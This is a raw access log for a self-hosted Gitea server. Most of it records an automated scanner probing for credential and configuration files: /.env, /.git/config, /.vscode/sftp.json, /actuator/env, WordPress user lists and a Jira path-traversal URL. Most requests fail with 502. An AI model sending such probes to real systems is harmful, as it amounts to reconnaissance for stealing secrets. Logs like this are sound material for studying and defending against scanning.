[15/Feb/2026:01:52:19 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.DS_Store" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:19 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.DS_Store" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:20 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.env" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:20 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.env" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:22 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:22 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:24 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.git/config" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:24 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.git/config" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/graphql" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:25 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/graphql" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/api" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/api/graphql" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:25 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/graphql/api" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:26 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/api" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:26 +0000] - 502 502 - POST http git.hanmocnn.co.kr "/api/gql" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:26 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:26 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/api/graphql" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:27 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/config.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:27 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/graphql/api" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:27 +0000] - 502 502 - POST https git.hanmocnn.co.kr "/api/gql" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:28 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/s/1353e21343e2731313e2232323/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:29 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/telescope/requests" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:29 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/config.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:29 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/info.php" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:30 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.well-known/security.txt" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:31 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/telescope/requests" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:31 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/actuator/env" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:31 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 95.215.39.14] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1" "-"
|
||||||
|
[15/Feb/2026:01:52:31 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/info.php" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:32 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 95.215.39.14] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1" "https://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:52:32 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.well-known/security.txt" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:33 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger-ui.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:33 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/actuator/env" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:34 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger/index.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:35 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:35 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger-ui.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:36 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:36 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger/index.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:37 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:37 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger/swagger-ui.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:38 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:38 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/webjars/swagger-ui/index.html" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:39 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/v2/api-docs" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:39 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:40 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/v3/api-docs" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:40 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/swagger/v1/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:41 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/api-docs/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:41 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/v2/api-docs" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:42 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/api/swagger.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:42 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/v3/api-docs" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:43 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/@vite/env" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:43 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/api-docs/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:44 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/.vscode/sftp.json" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:44 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/api/swagger.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:45 +0000] - 502 502 - OPTIONS http git.hanmocnn.co.kr "/" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:45 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/@vite/env" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:46 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:46 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/.vscode/sftp.json" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:47 +0000] - 502 502 - GET http git.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 139.59.231.238] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:47 +0000] - 502 502 - OPTIONS https git.hanmocnn.co.kr "/" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:48 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/?rest_route=/wp/v2/users/" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:52:49 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/debug/default/view?panel=config" [Client 146.190.242.161] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (l9scan/2.0.1353e21343e2731313e2232323; +https://leakix.net)" "-"
|
||||||
|
[15/Feb/2026:01:53:44 +0000] - - 301 - GET http git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:53:44 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "http://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:53:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:53:47 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:53:47 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:53:49 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:53:49 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:53:50 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:53:50 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:54:02 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:54:02 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:54:17 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:01:54:17 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 556] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/"
|
||||||
|
[15/Feb/2026:01:54:51 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:54:51 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:54:54 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:54:55 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:56:08 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/" [Client 54.86.115.253] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "RecordedFuture Global Inventory Crawler" "-"
|
||||||
|
[15/Feb/2026:01:56:14 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-"
|
||||||
|
[15/Feb/2026:01:56:15 +0000] - 502 502 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-upload-pack" [Client 222.117.41.51] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-"
|
||||||
|
[15/Feb/2026:01:57:04 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:57:34 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:57:44 +0000] - - 301 - HEAD http git.hanmocnn.co.kr "/" [Client 176.65.148.161] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org)" "-"
|
||||||
|
[15/Feb/2026:01:58:15 +0000] - 502 502 - HEAD https git.hanmocnn.co.kr "/" [Client 146.70.185.32] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11447] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/theme-gitea-dark-protanopia-deuteranopia.css?v=1.25.3" [Client 222.117.41.51] [Length 3036] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/css/index.css?v=1.25.3" [Client 222.117.41.51] [Length 55932] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/js/index.js?v=1.25.3" [Client 222.117.41.51] [Length 88858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/logo.svg" [Client 222.117.41.51] [Length 1040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
[15/Feb/2026:02:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/assets/img/avatar_default.png" [Client 222.117.41.51] [Length 4595] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-"
|
||||||
|
